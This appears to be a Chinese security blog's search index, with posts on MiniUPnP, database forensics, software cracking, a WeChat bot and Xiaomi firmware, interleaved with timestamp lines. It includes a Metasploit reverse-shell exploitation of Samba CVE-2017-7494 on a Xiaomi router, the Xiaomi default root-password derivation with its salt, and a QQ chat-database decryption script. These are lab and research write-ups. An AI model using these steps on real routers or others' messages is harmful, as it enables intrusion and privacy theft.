2019-04-15 07:42:42 +00:00
<?xml version="1.0" encoding="utf-8"?>
2019-04-15 07:58:23 +00:00
<search >
2019-04-21 06:54:52 +00:00
<entry >
<title > <![CDATA[小米路由器_MiniUPnP协议]]> </title>
<url > %2F2019%2F04%2F21%2FXIAOMI-UPnP%2F</url>
2019-05-07 11:32:10 +00:00
<content type= "text" > < ![CDATA[概述HomePageOpenWRT与miniUPnP MiniUPnP项目提供了支持UPnP IGD(互联网网关设备)规范的软件。在MiniUPnPd中添加了NAT-PMP和PCP支持。 对于客户端( MiniUPnPc) 使用libnatpmp来支持NAT-PMP。MiniUPnP守护程序( MiniUPnPd) 支持OpenBSD, FreeBSD, NetBSD, DragonFly BSD( Open) Solaris和Mac OS X以及pf或ipfw( ipfirewall) 或ipf和Linux with netfilter。 MiniUPnP客户端( MiniUPnPc) 和MiniSSDPd是便携式的, 可以在任何POSIX系统上运行。 MiniUPnPc也适用于MS Windows和AmigaOS( 版本3和4) 。 UPnP IGD客户端轻量级库和UPnP IGD守护进程大多数家庭adsl /有线路由器和Microsoft Windows 2K/XP都支持UPnP协议。 MiniUPnP项目的目标是提供一个免费的软件解决方案来支持协议的“Internet网关设备”部分。 用于UPnP设备的Linux SDK( libupnp) 对我来说似乎太沉重了。 我想要最简单的库, 占用空间最小, 并且不依赖于其他库, 例如XML解析器或HTTP实现。 所有代码都是纯ANSI C. miniupnp客户端库在x86 PC上编译, 代码大小不到50KB。miniUPnP守护程序比任何其他IGD守护程序小得多, 因此非常适合在低内存设备上使用。 它也只使用一个进程而没有其他线程, 不使用任何system( ) 或exec( ) 调用, 因此保持系统资源使用率非常低。该项目分为两个主要部分: MiniUPnPc, 客户端库, 使应用程序能够访问网络上存在的UPnP“Internet网关设备”提供的服务。 在UPnP术语中, MiniUPnPc是UPnP控制点。 MiniUPnPd, 一个守护进程, 通过作为网关的linux或BSD( 甚至Solaris) 为您的网络提供这些服务。 遵循UPnP术语, MiniUPnPd是UPnP设备。开发MiniSSDPd与MiniUPnPc, MiniUPnPd和其他协作软件一起工作: 1. MiniSSDPd监听网络上的SSDP流量, 因此MiniUPnPc或其他UPnP控制点不需要执行发现过程, 并且可以更快地设置重定向; 2. MiniSSDPd还能够代表MiniUPnPd或其他UPnP服务器软件回复M-SEARCH SSDP请求。 这对于在同一台机器上托管多个UPnP服务很有用。守护进程现在也可以使用netfilter用于linux 2.4.x和2.6.x. 可以使它在运行OpenWRT的路由器设备上运行。由于某些原因, 直接使用MiniUPnP项目中的代码可能不是一个好的解决方案。由于代码很小且易于理解, 因此为您自己的UPnP实现提供灵感是一个很好的基础。 C ++中的KTorrent UPnP插件就是一个很好的例子。 MiniUPnP客户端库的实用性只要应用程序需要侦听传入的连接, MiniUPnP客户端库的使用就很有用。例如: P2P应用程序, 活动模式的FTP客户端, IRC( 用于DCC) 或IM应用程序, 网络游戏, 任何服务器软件。 路由器的UPnP IGD功能的典型用法是使用MSN Messenger的文件传输。 MSN Messenger软件使用Windows XP的UPnP API打开传入连接的端口。 为了模仿MS软件, 最好也使用UPnP。 已经为XChat做了一个补丁, 以展示应用程序如何使用miniupnp客户端库。 传输, 一个免费的软件BitTorrent客户端正在使用miniupnpc和libnatpmp。 MiniUPnP守护进程的实用性UPnP和NAT-PMP用于改善NAT路由器后面的设备的互联网连接。 诸如游戏, IM等的任何对等网络应用可受益于支持UPnP和/或NAT-PMP的NAT路由器。最新一代的Microsoft XBOX 360和Sony Playstation 3游戏机使用UPnP命令来启用XBOX Live服务和Playstation Network的在线游戏。 据报道, MiniUPnPd正在与两个控制台正常工作。 它可能需要一个精细的配置调整。 安全UPnP实施可能会受到安全漏洞的影响。 错误执行或配置的UPnP IGD易受攻击。 安全研究员HD Moore做了很好的工作来揭示现有实施中的漏洞: 通用即插即用( PDF) 中的安全漏洞。 一个常见的问题是让SSDP或HTTP/SOAP端口对互联网开放: 它们应该只能从LAN访问。 协议栈工作流程 Linux体系结构 发现给定一个IP地址( 通过DHCP获得) , UPnP网络中的第一步是发<E698AF>
2019-04-21 06:54:52 +00:00
<categories >
<category > IOT</category>
</categories>
<tags >
<tag > 小米</tag>
<tag > 路由器</tag>
<tag > MiniUPnP</tag>
</tags>
</entry>
2019-04-15 07:58:23 +00:00
<entry >
2019-04-15 08:02:11 +00:00
<title > <![CDATA[复原数据库存储以检测和跟踪安全漏洞]]> </title>
2019-04-15 07:58:23 +00:00
<url > %2F2019%2F04%2F15%2FCaving-db-storage%2F</url>
2019-04-15 08:02:11 +00:00
<content type= "text" > < ![CDATA[Carving Database Storage to Detect and Trace Security Breaches 复原数据库存储以检测和跟踪安全漏洞原文下载 MotivationDBMS(数据库管理系统) 通常用于存储和处理敏感数据, 因此, 投入了大量精力使用访问控制策略来保护DBMS。 一旦用户在DBMS中获得提升权限( 无论是合理的还是通过攻击的) , 实施的安全方案可以绕过, 因此无法再根据政策保证数据受到保护。1) 访问控制策略可能不完整, 允许用户执行他们不能执行的命令2) 用户可能通过使用DB或OS代码中的安全漏洞或通过其他方式非法获取权限 部署预防措施1) 在及时发生安全漏洞时检测安全漏洞;2) 在检测到攻击时收集有关攻击的证据, 以便设计对抗措施并评估损害程度 例子Malice是政府机构的数据库管理员, 为公民提供犯罪记录。 Malice最近被判犯有欺诈罪, 并决定滥用她的特权, 并通过运行DELETE FROM Record WHERE name = ‘ Malice’ 来删除她的犯罪记录。但是, 她知道数据库操作需要定期审核, 以检测对机构存储的高度敏感数据的篡改。为了覆盖她的操作, Malice在运行DELETE操作之前停用审计日志, 然后再次激活日志。因此, 在数据库中没有她的非法操纵的日志跟踪。但是, 磁盘上的数据库存储仍将包含已删除行的证据。作者的方法检测已删除的痕迹和过期的记录版本, 并将它们与审核日志进行匹配, 以检测此类攻击, 并提供数据库操作方式的证据。作者将检测已删除的行, 因为它与审计日志中的任何操作都不对应, 我们会将其标记为篡改的潜在证据。 思路一览 提出方法使用称为DICE的现有取证工具( Wagner等, 2017) 来重建数据库存储通过匹配提取的存储条目, 报告任何无法通过操作记录解释的工件来自动检测潜在的攻击 DBDetective检查数据库存储和RAM快照, 并将它找到的内容与审计日志进行比较 然后,在不影响数据库操作的情况下,对核心数据进行分析。 确定数据库篡改的可能性, 并指出数据库存储中发现的具体不一致性。由于数据库存储的易变性, 无法保证将发现所有攻击。在对于我们评估的每个主要DBMS, 我们假设DBMS已启用审计日志来捕获与调查相关的SQL命令。我们进一步假设一名攻击者通过以下方式阻止记录已执行的恶意命令: 停用审计策略并暂时挂起日志记录 更改现有审计日志(两者都在数据库日志可靠性部分中讨论)。通过将取证分析技术应用于数据库存储或缓冲区缓存,并将发现的证据与审计日志相匹配,可以: 检测DBMS审核日志中未显示的多种类型的数据库访问和操作。 将未归因的记录修改分类为模糊的INSERT, DELETE或UPDATE命令。 检测无法从审核日志中的活动派生的( 只读) SELECT查询中的缓存数据。 Reliability of database logs攻击者可以更改两种类型的日志: write-ahead logs (WAL) and audit logs (event history records) WALs以低级别记录数据库修改以支持ACID保证, 提供最近表修改的历史记录。通常无法禁用或轻松修改WAL, 并且需要读取专用工具( 例如, Oracle LogMiner或PostgreSQL pg_xlogdump) 。某些DBMS允许为特定操作禁用WAL, 例如批量加载或结构重建。因此, 可以通过此功能插入记录而不留下日志跟踪。 audit logs记录配置的用户数据库操作。包括SQL操作和其他用户活动。审计日志根据数据库管理员配置的日志记录策略存储已执行的SQL命令。 因此,管理员可以根据需要禁用日志记录或修改单个日志记录。 Detecting hidden record modifications插入或修改表记录时, 数据库中会发生一连串的存储更改。 除了受影响记录的数据本身之外, 页面元数据会更新( 例如, 设置删除标记) , 并且存储记录的索引的页面会改变<E694B9>
2019-04-15 07:42:42 +00:00
<categories >
2019-04-15 07:58:23 +00:00
<category > 顶会论文</category>
2019-04-15 07:42:42 +00:00
</categories>
2019-04-15 07:58:23 +00:00
<tags >
<tag > 数据库</tag>
<tag > 复原文件</tag>
<tag > 取证</tag>
</tags>
</entry>
<entry >
<title > <![CDATA[逆向工程与软件破解]]> </title>
<url > %2F2019%2F03%2F28%2F%E9%80%86%E5%90%91%E5%B7%A5%E7%A8%8B%E5%AE%9E%E9%AA%8C%2F</url>
2019-05-07 11:32:10 +00:00
<content type= "text" > < ![CDATA[软件保护方式 功能限制 时间限制 运行时长限制 使用日期限制 使用次数限制 警告窗口 分析工具 静态分析工具 IDA W32Dasm lordPE Resource Hacker 动态分析工具 OllyDbg WinDbg 对抗分析技术 反静态分析技术 花指令 自修改代码技术 多态技术 变形技术 虚拟机保护技术 反动态分析技术 检测调试状态 检测用户态调试器 检测内核态调试器 其他方法: 父进程检测; StartupInfo 结构; 时间差; 通过Trap Flag检测 发现调试器后的处理 程序自身退出 向调试器窗口发送消息使调试器退出 使调试器窗口不可用 终止调试器进程 PE文件格式基础 加壳脱壳 反调试技术反调试技术,程序用它来识别是否被调试,或者让调试器失效。为了阻止调试器的分析,当程序意识到自己被调试时,它们可能改变正常的执行路径或者修改自身程序让自己崩溃,从而增加调试时间和复杂度。 探测windows调试器 使用windows API使用Windows API函数探测调试器是否存在是最简单的反调试技术。通常, 防止使用API进行反调试的方法有在程序运行期间修改恶意代码, 使其不能调用API函数, 或修改返回值, 确保执行合适的路径, 还有挂钩这些函数。常用来探测调试器的API函数有: IsDebuggerPresent CheckRemoteDebuggerPresent NtQueryInformationProcess OutputDebuggString 手动检测数据结构程序编写者经常手动执行与这些API功能相同的操作 检查BeingDebugged属性 检测ProcessHeap属性 检测NTGlobalFlag 系统痕迹检测通常, 我们使用调试工具来分析程序, 但这些工具会在系统中驻留一些痕迹。程序通过搜索这种系统的痕迹, 来确定你是否试图分析它。例如, 查找调试器引用的注册表项。同时, 程序也可以查找系统的文件和目录, 查找当前内存的痕迹, 或者查看当前进程列表, 更普遍的做法是通过FindWindows来查找调试器。 识别调试器的行为在逆向工程中, 可以使用断点或单步调试来帮助分析, 但执行这些操作时, 会修改进程中的代码。因此可以使用几种反调试技术探测INT扫描、完整性校验以及时钟检测等几种类型的调试器行为。 INT扫描调试器设置断点的基本机制是用软件中断INT 3, 机器码为0xCC, 临时替换程序中的一条指令。因此可以通过扫描INT 3修改来检测。 执行代码校验和检查与INT扫描目的相同, 但仅执行机器码的CRC或MD5校验和检查。 时钟检测被调试时, 进程的运行速度大大降低, 常用指令有: rdstc QueryPerformanceCounter GetTickCount,有如下两种方式探测时钟: 记录执行一段操作前后的时间戳 记录触发一个异常前后的时间戳干扰调试器的功能本地存储(TLS)回调: TLS回调被用来在程序入口点执行之前运行代码, 这发生在程序刚被加载到调试器时使用异常: 使用SEH链可以实现异常, 程序可以使用异常来破坏或探测调试器, 调试器捕获异常后, 并不会将处理权立即返回给被调试进程。插入中断: 插入INT 3、INT 2D、ICE调试器漏洞PE头漏洞、OutputDebugString漏洞 实验一: 软件破解对象crack.exe, 28.0 KB 无保护措施:无壳、未加密、无反调试措施 用户名至少要5个字节 输入错误验证码时输出: “Bad Boy!” 爆破查找显示注册结果相关代码当输入错误验证码时, 程序会输出“Bad Boy”, 因此我们将程序拖入IDA, 以流程图显示函数内部的跳转。查找“Bad Boy”字符串, 我们可以定位到显示注册结果的相关代码: 查找注册码验证相关代码用鼠标选中程序分支点,按空格切换回汇编指令界面 可以看到, 这条指令位于PE文件的.text节, 并且IDA已经自动将地址转换为运行时的内存地址VA:004010F9 修改程序跳转 现在关闭IDA, 换用OllyDbg进行动态调试来看看程序时如何分支跳<E694AF>
2019-04-15 07:42:42 +00:00
<categories >
2019-04-15 07:58:23 +00:00
<category > 二进制</category>
2019-04-15 07:42:42 +00:00
</categories>
2019-04-15 07:58:23 +00:00
<tags >
<tag > 逆向</tag>
<tag > 破解</tag>
</tags>
</entry>
<entry >
<title > <![CDATA[小米路由器与Samba漏洞CVE-2017-7494]]> </title>
<url > %2F2019%2F03%2F25%2FSamba-CVE%2F</url>
<content type= "text" > < ![CDATA[小米路由器与Samba漏洞CVE-2017-7494漏洞描述Samba服务器软件存在远程执行代码漏洞。攻击者可以利用客户端将指定库文件上传到具有可写权限的共享目录, 会导致服务器加载并执行指定的库文件。具体执行条件如下: 服务器打开了文件/打印机共享端口445, 让其能够在公网上访问 共享文件拥有写入权限 恶意攻击者需猜解Samba服务端共享目录的物理路径 Samba介绍Samba是在Linux和Unix系统上实现SMB协议的一个免费软件, 由服务器及客户端程序构成。SMB( Server Messages Block, 信息服务块) 是一种在局域网上共享文件和打印机的一种通信协议, 它为局域网内的不同计算机之间提供文件及打印机等资源的共享服务。 SMB协议是客户机/服务器型协议, 客户机通过该协议可以访问服务器上的共享文件系统、打印机及其他资源。通过设置“NetBIOS over TCP/IP”使得Samba不但能与局域网络主机分享资源, 还能与全世界的电脑分享资源。 漏洞成因处于\source3\rpc_server\src_pipe.c的is_known_pipename()函数未对传进来的管道名pipename的路径分隔符/进行识别过滤, 导致可以用绝对路径调用恶意的so文件, 从而远程任意代码执行。首先看到is_known_pipename()函数 跟进到smb_probe_module() 再跟进到do_smb_load_module(),发现调用的过程就在其中,调用了传进来的moudule_name对应的init_samba_module函数 我们可以通过smb服务上传一个恶意的so文件, 该文件包含一个输出函数init_samba_module, 随后通过上述过程进行调用, 执行任意代码。 漏洞复现小米路由器123456netstat -apnttcp 0 0 192.168.31.1:445 0.0.0.0:* LISTEN 0 572 1917/smbdnmap 192.168.31.1139/tcp open netbios-ssn445/tcp open microsoft-ds 端口已开启12345678910111213141516171819202122232425262728293031323334353637383940414243444546vim /etc/samba/smb.conf deadtime = 30 domain master = yes encrypt passwords = true enable core files = no guest account = nobody guest ok = yes invalid users = local master = yes load printers = no map to guest = Bad User min receivefile size = 16384 null passwords = yes obey pam restrictions = yes passdb backend = smbpasswd preferred master = yes printable = no smb encrypt = disabled smb passwd file = /etc/samba/smbpasswd socket options = SO_SNDBUFFORCE=1048576 SO_RCVBUFFORCE=1048576 smb2 max trans = 1048576 smb2 max write = 1048576 smb2 max read = 1048576 write cache size = 262144 syslog = 2 syslog only = yes use sendfile = yes writeable = yes log level = 1 unicode = True max log size = 500 log file = /tmp/log/samba.log server role = STANDALONE[homes] comment = Home Directories browsable = no read only = no create mode = 0750[data] ***SMB_SHARE_NAME*** path = /tmp ***SMB_FOLDER*** read only = no ***具备可写权限*** guest ok = yes ***允许匿名*** create mask = 0777 directory mask = 0777 具有可写权限、目录为/tmp 攻击: 使用metasploit设置攻击参数靶机是小米路由器R3, 它的系统为mips架构, 但是这个库好像对它的支持不是很好12345678910111213141516171819202122232425show optionsModule options (exploit/linux/samba/is_known_pipename): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS 192.168.31.1 yes The target address range or CIDR identifier RPORT 445 yes The SMB service port (TCP) SMB_FOLDER no The directory to use within the writeable SMB share SMB_SHARE_NAME no The name of the SMB share containing a writeable directoryPayload options (generic/shell_reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 192.168.216.129 yes The listen address (an interface may be specified) LPORT 4444 yes The listen portExploit target: Id Name -- ---- 7 Linux MIPSLE 执行攻击123456789101112exploit[*] Started reverse TCP handler on 192.168.216.129:4444[*] 192.168.31.1:445 - Using location \\192.168.31.1\data\ for the path[*] 192.168.31.1:445 - Ret
2019-04-15 07:42:42 +00:00
<categories >
2019-04-15 07:58:23 +00:00
<category > IOT</category>
2019-04-15 07:42:42 +00:00
</categories>
2019-04-15 07:58:23 +00:00
<tags >
<tag > Samba</tag>
<tag > 远程执行</tag>
<tag > CVE</tag>
</tags>
</entry>
<entry >
<title > <![CDATA[利用itchat定时转发微信消息]]> </title>
<url > %2F2019%2F03%2F23%2Fauto-send-WX%2F</url>
<content type= "text" > < ![CDATA[我们实验室有个光荣传统, 每天早上起床叫醒我的不是闹钟, 而是群里雷打不动的安全新闻( 其实我免提醒了2333) 而这个发送新闻的人, 一代一代的传承, 我没想到竟然有一天会落在我头上, 哭了o(╥﹏╥)o为了不暴露我的起床时间, 同时能保质保量的完成任务, 我决定做个机器人帮我完成。这就是这片po文的由来啦! 大杀器itchatintroduction先来一段itchat的官方介绍吧 itchat是一个开源的微信个人号接口, 使用python调用微信从未如此简单。使用不到三十行的代码, 你就可以完成一个能够处理所有信息的微信机器人。当然, 该api的使用远不止一个机器人, 更多的功能等着你来发现, 比如这些。该接口与公众号接口itchatmp共享类似的操作方式, 学习一次掌握两个工具。如今微信已经成为了个人社交的很大一部分, 希望这个项目能够帮助你扩展你的个人的微信号、方便自己的生活。 实际上, itchat是对微信网页端的爬虫, 所以, 网页端可以实现的功能都有, 那么, 我想要的定时群发微信消息, 自然不在话下! 初步尝试 安装 1pip install itchat 一个简单实例:实现给文件传输助手发送消息 123import itchatitchat.auto_login()itchat.send(' Hello, filehelper' , toUserName=' filehelper' ) 实现定时转发这个的实现需要注册msg_register,逻辑很简单, 当收到指定群里的指定消息时, 将消息转发到另一个群。12345678910111213141516171819202122232425262728293031323334353637383940import itchatfrom datetime import datetimeimport timeimport reimport threadingfrom itchat.content import TEXTfrom itchat.content import *from apscheduler.schedulers.blocking import BlockingScheduler@itchat.msg_register([TEXT], isFriendChat=True, isGroupChat=True, isMpChat=True)def getContent(msg): global g_msg groups = itchat.get_chatrooms(update = True) for g in groups: #print(g[' NickName' ]) if g[' NickName' ] == ' 被转发的群名' : from_group = g[' UserName' ] if ' 每日安全简讯' in msg[' Content' ]: print(" get message from " + msg[' FromUserName' ]) if msg[' FromUserName' ] == from_group: g_msg = msg[' Content' ] print(' 成功获得群消息,等待转发' ) print(int(time.strftime(" %H%M%S" ))) while(1): if int(time.strftime(" %H%M%S" )) > 80000: SendMessage(g_msg,' 发送的对象群名' ) g_msg = ' ' breakdef SendMessage(context,gname): itchat.get_chatrooms(update = True) users = itchat.search_chatrooms(name=gname) userName = users[0][' UserName' ] itchat.send_msg(context,toUserName=userName) print(" \n发送时间: " + datetime.now().strftime(" %Y-%m-%d %H:%M:%S" ) + " \n" " 发送到:" + gname + " \n" + " 发送内容:" + context + " \n" ) print(" *********************************************************************************" )if __name__ == ' __main__' : itchat.auto_login(hotReload=True,enableCmdQR=2) itchat.run(blockThread=False) 添加周期防掉线据说每三十分钟发送一次消息可防止网页端微信掉线~~123456789101112def loop_send(): nowTime = datetime.now().strftime(" %Y-%m-%d %H:%M:%S" ) context = ' 现在是北京时间 :\n' + nowTime +' \n\n我们还活着' itchat.get_chatrooms(update = True) users = itchat.search_friends(name=u' chengkun' ) userName = users[0][' UserName' ] itchat.send_msg(context,toUserName=userName)if __name__ == ' __main__' : sched = BlockingScheduler() sched.add_job(loop_send,' interval' ,minutes=30) sched.start() 把程序放在服务器上我是在腾讯云有个服务器, 因为自己的电脑不可能时时刻刻开机, 所以就放在服务器上, 方法是: 1sudo nohup python -u auto_Send.py > > auto_Send.log 2> & 1 & 使
2019-04-15 07:42:42 +00:00
<categories >
2019-04-15 07:58:23 +00:00
<category > 杂七杂八</category>
2019-04-15 07:42:42 +00:00
</categories>
2019-04-15 07:58:23 +00:00
<tags >
<tag > itchat</tag>
<tag > 微信</tag>
</tags>
</entry>
<entry >
<title > <![CDATA[小米固件工具mkxqimage]]> </title>
<url > %2F2019%2F03%2F16%2F%E5%B0%8F%E7%B1%B3%E5%9B%BA%E4%BB%B6%E5%B7%A5%E5%85%B7mkxqimage%2F</url>
<content type= "text" > <![CDATA[小米固件工具mkxqimage小米自己改了个打包解包固件的工具, 基于 trx 改的(本质上还是 trx 格式),加了 RSA 验证和解包功能, 路由系统里自带: 1234Usage:mkxqimg [-o outfile] [-p private_key] [-f file] [-f file [-f file [-f file ]]] [-x file] [-I] 固件解包固件工具mkxqimage完成对固件的解包, 在解包前先检查Checksum是否正确, 然后利用RSA公钥/usr/share/xiaoqiang/public.pem检查RSA签名, 这两个步骤通过后, 根据[0x0C]的固件类型,以及[0x10]、[0x14]、[0x18]和[0x1C]的4个偏移量拆分固件。 固件打包小米官方在打包固件时用RSA私钥计算出固件的RSA签名, 小米路由器下载固件后用RSA公钥来验证RSA签名, 有效地防止固件被篡改。 固件格式路由固件的格式,基本是基于 openwrt 的 trx 这个简单的二进制文件格式12348 44 52 30 63 D4 11 03 FE 3D 1A FD 05 00 02 0020 00 00 00 20 00 FE 00 00 00 00 00 00 00 00 00FF 04 00 EA 14 F0 9F E5 14 F0 9F E5 14 F0 9F E5 第1~ 4字节: ASCII字符串“HDR0”, 作为固件的标识; 第5~ 8字节: 4字节整型数0x0311D464, 表示固件的大小: 51500132字节; 第9~12字节: 固件的检查和; 第13~ 14字节: 0x0005, 表示固件中包含哪些部分; 第15~ 16字节: 0x0002, 表示固件格式版本号; 第17~ 20字节: 0x00000020, 表示固件第一部分在整个固件中的偏移量, 0.4.85固件的第一部分是brcm4709_nor.bin, 也就是Flash中除0xfe0000-0xff0000的board_data外的全镜像; 第21~ 24字节: 0x00FE0020, 表示固件第二部分在整个固件中的偏移量, 0.4.85固件的第二部分是root.ext4.lzma, 也就是硬盘中128M固件的压缩包; 第33字节开始是固件的正式内容开始。 小米开启ssh工具包使用mkxqimage解包( 现在会提示秘钥不存在) 12error fopen public keyImage verify failed, not formal image 如果能解包应该可以得到脚本文件upsetting.sh 1234#!/bin/shnvram set ssh_en=1nvram set flag_init_root_pwd=1nvram commit 执行脚本文件upsetting.sh后, 将ssh_en设置为1, 同时设置了flag_init_root_pwd项。当正式启动时, /usr/sbin/boot_check脚本检测到flag_init_root_pwd=1时, 自动修改root用户密码, 具体脚本为: 1234567flg_init_pwd=`nvram get flag_init_root_pwd`if [ "$flg_init_pwd" = "1" ]; then init_pwd=`mkxqimage -I` (echo $init_pwd; sleep 1; echo $init_pwd) | passwd root nvram unset flag_init_root_pwd nvram commitfi 初始密码是mkxqimage -I的结果, 实际是根据路由器的序列号计算得到。路由器的序列号印在底盖上, 12位数字, 如: 561000088888 初始密码计算算法为: substr(md5(SN+"A2E371B0-B34B-48A5-8C40-A7133F3B5D88"), 0, 8) A2E371B0-B34B-48A5-8C40-A7133F3B5D88 为分析mkxqimage得到的salt]]> </content>
2019-04-15 07:42:42 +00:00
<categories >
2019-04-15 07:58:23 +00:00
<category > IOT</category>
2019-04-15 07:42:42 +00:00
</categories>
2019-04-15 07:58:23 +00:00
<tags >
<tag > 小米</tag>
<tag > 文件格式</tag>
<tag > SSH</tag>
</tags>
</entry>
<entry >
<title > <![CDATA[QQ数据库的加密与解密]]> </title>
<url > %2F2019%2F02%2F22%2Fqq%E6%95%B0%E6%8D%AE%E5%BA%93%E7%9A%84%E5%8A%A0%E5%AF%86%E8%A7%A3%E5%AF%86%2F</url>
<content type= "text" > <![CDATA[qq数据库采用简单加密——异或加密数据获取: DENGTA_META.xml—IMEI:867179032952446databases/2685371834.db——数据库文件 解密方式: 明文msg_t 密文msg_Data key: IMEImsg_t = msg_Data[i]^IMEI[i%15] 实验: 123456789101112131415161718192021222324import sqlite3IMEI = '867179032952446'conn = sqlite3.connect('2685371834.db')c = conn.cursor()def _decrypt(foo): substr = '' #print(len(foo)) for i in range(0,len(foo)): substr += chr(ord(foo[i]) ^ ord(IMEI[i%15])) return substr#rem = c.execute("SELECT uin, remark, name FROM Friends")Msg = c.execute("SELECT msgData, senderuin, time FROM mr_friend_0FC9764CD248C8100C82A089152FB98B_New")for msg in Msg: uid = _decrypt(msg[1]) print("\n"+uid+":") try: msgData = _decrypt(msg[0]).decode('utf-8') print(msgData) except: pass 结果]]> </content>
2019-04-15 07:42:42 +00:00
<categories >
2019-04-15 07:58:23 +00:00
<category > 加密解密</category>
2019-04-15 07:42:42 +00:00
</categories>
2019-04-15 07:58:23 +00:00
<tags >
<tag > 密码</tag>
<tag > QQ</tag>
<tag > 数据库</tag>
</tags>
</entry>
<entry >
<title > <![CDATA[wifi半双工侧信道攻击学习笔记]]> </title>
<url > %2F2019%2F01%2F16%2Fwifi%E5%8D%8A%E5%8F%8C%E5%B7%A5%E4%BE%A7%E4%BF%A1%E9%81%93%E6%94%BB%E5%87%BB%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0%2F</url>
<content type= "text" > < ![CDATA[TCP侧信道分析及利用的学习报告论文来源: USENIX SECURITY 2018: Off-Path TCP Exploit: How Wireless Routers Can Jeopardize Your Secrets下载: 原文pdf中文slides 背景知识测信道香农信息论 什么是信息? 用来减少随机不确定的东西 什么是加密? 类似于加噪声,增加随机不确定性 “从密码分析者来看,一个保密系统几乎就是一个通信系统。待传的消息是统计事件,加密所用的密钥按概率选出,加密结果为密报,这是分析者可以利用的,类似于受扰信号。” 侧信道随之出现 越过加密算法增加的随机不定性,从其他的渠道获取数据标签,确定信息内容。 早期:采集加密电子设备在运行过程中的时间消耗、功率消耗或者电磁辐射消耗等边缘信息的差异性 而随着研究的深入, 逐渐从加密设备延伸到计算机内部CPU、内存等之间的信息传递 并在Web应用交互信息传递越来越频繁时, 延伸到了网络加密数据流的破解方面 侧信道攻击的流程 第一个就是侧信道泄露的截取,第二个是信息的恢复。 网络攻击 中间人攻击 “指攻击者与通讯的两端分别创建独立的联系,并交换其所收到的数据,使通讯的两端认为他们正在通过一个私密的连接与对方直接对话,但事实上整个会话都被攻击者完全控制。” 公共wifi、路由器劫持 一般使用加密来防御 加密的代价:维护密钥证书、影响功能(运营商无法做缓存) 非中间人攻击/偏离路径攻击/off-path attack 通信线路之外,攻击者看不到双方的消息,没办法截获和发送通信包。智能伪造成一方给另一方发消息。 攻击成功需要:消息合法+最先到达 防御措施: challenge-response/询问-应答机制双方在通信前交换一个随机数,这个随机数在每次的通信中都要被附带,而中间人看不见这个随机数,因此伪造的消息被认为不合法。 攻击者如何得到这个随机数:侧信道 TCP三次握手 客户端通过向服务器端发送一个SYN来创建一个主动打开, 作为三路握手的一部分。客户端把这段连接的序号设定为随机数A。 服务器端应当为一个合法的SYN回送一个SYN/ACK。ACK的确认码应为A+1, SYN/ACK包本身又有一个随机产生的序号B。 最后, 客户端再发送一个ACK。当服务端收到这个ACK的时候, 就完成了三路握手, 并进入了连接创建状态。此时包的序号被设定为收到的确认号A+1, 而响应号则为B+1。 通过三次握手,确定对方不是非中间人 TCP序列号的问题 1985 1995 2001 2004 2007 2012 2012 2016 Morris Mitnik Zalewsky Waston kLM Herzberg 作者 作者 初始序列可预测 真实利用 漏洞仍在 BGP DoS Windows攻击 Puppet-assisted Malware-assisted off-path attack 90年代时发现并不随机: 1995年伪造客户端连接微软大楼的服务器 2007年在windows场景下用IDID侧信道猜出序列号: 只针对Windows, 花费几小时 Malware-assisted攻击模型: 给受害者安装一个无特权的应用程序( 仅能网络连接) , 这个程序跟非中间人的攻击者里应外合, 劫持手机上所有的TCP连接。 如何劫持TCP 需要的信息: Facebook的连接IP地址和端口号, 由此可以知道TCP连接的序列号, 利用序列号伪装成Facebook给手机发消息。使用netstat命令获取: 任务: 由于TCP的序列号通常连续, 所以要精确猜到它的下一个序列号。 如何验证序列号正确:通过某种侧信道,这个恶意软件在后台可以提供反馈。 变种一:防火墙攻击过程: TCP三次握手之后产生A和B, 将来传输的包序列号必须跟A和B很接近, 否则, 防火墙会丢弃这个包。因此只有猜对了序列号, 包才能到达手机端。到达手机端后, 后台的恶意软件可以帮助我们判断手机是否接受了这个数据包。 具体侧信道方案: CPU资源使用率( 噪音<E599AA>
2019-04-15 07:42:42 +00:00
<categories >
2019-04-15 07:58:23 +00:00
<category > 顶会论文</category>
2019-04-15 07:42:42 +00:00
</categories>
2019-04-15 07:58:23 +00:00
<tags >
<tag > 侧信道攻击</tag>
<tag > wifi</tag>
</tags>
</entry>
<entry >
<title > <![CDATA[基于采集规则引擎的物联网设备发现方法]]> </title>
<url > %2F2018%2F12%2F23%2F%E5%9F%BA%E4%BA%8E%E8%A7%84%E5%88%99%E5%BC%95%E6%93%8E%E5%8F%91%E7%8E%B0IOT%E8%AE%BE%E5%A4%87%2F</url>
<content type= "text" > < ![CDATA[论文来源: USENIX SECURITY 2018: Acquisitional Rule-based Engine for Discovering Internet-of-Things Devices下载: 原文pdf中文slides 论文解读概要: 物联网( IoT) 设备的快速增长的格局为其管理和安全性带来了重大的技术挑战, 因为这些物联网设备来自不同的设备类型, 供应商和产品模型。 物联网设备的发现是表征,监控和保护这些设备的先决条件。然而,手动设备注释阻碍了大规模发现,并且基于机器学习的设备分类需要具有标签的大型训练数据。因此,大规模的自动设备发现和注释仍然是物联网中的一个悬而未决的问题。 这篇文章提出了一种基于采集规则的引擎( ARE) , 它可以自动生成用于在没有任何训练数据的情况下发现和注释物联网设备的规则。ARE通过利用来自物联网设备的应用层响应数据和相关网站中的产品描述来构建设备规则, 以进行设备注释。我们将事务定义为对产品描述的唯一响应之间的映射。 为了收集交易集, ARE提取响应数据中的相关术语作为抓取网站的搜索查询。ARE使用关联算法以( 类型, 供应商和产品) 的形式生成物联网设备注释的规则。我们进行实验和三个应用程序来验证ARE的有效性。 背景与动机: 物联网蓬勃发展, 造就了物联网设备的广泛应用, 它不仅种类繁多, 包括摄像头、打印机、路由器、电视盒子、工控系统、医疗设备等, 而且数量庞大, 据统计, 每天就会新增5500000台物联网设备。 但是由于设备脆弱、缺乏管理和配置不当, 物联网设备相比传统计算机要更不安全, 比如之前爆发的Mirai僵尸网络, 给美国造成了重大的损失。因此, 为了更主动地保护IOT设备, 提前发现、登记和注释物联网设备成为先决条件。 设备注释的内容通常为“设备类型(e.g.,routers) + 供应商(e.g.,CISCO) + 产品型号(e.g.,TV-IP302P)”,传统生成设备注释的方法有基于指纹的,也有使用标志获取的,前者对数据集和大量设备模型的要求很高,而后者需要专业知识的人工方式,因此不可能用于大规模注释而且很难去维护更新。 所以, 作者希望提出一种减少对数据集和人工依赖的注释方式。本文的方法主要基于两个事实, 第一个Figure 1是制造商通常会将相关信息硬编码到IOT设备, 第二个Figure 2是有许多网站( 如产品测评) 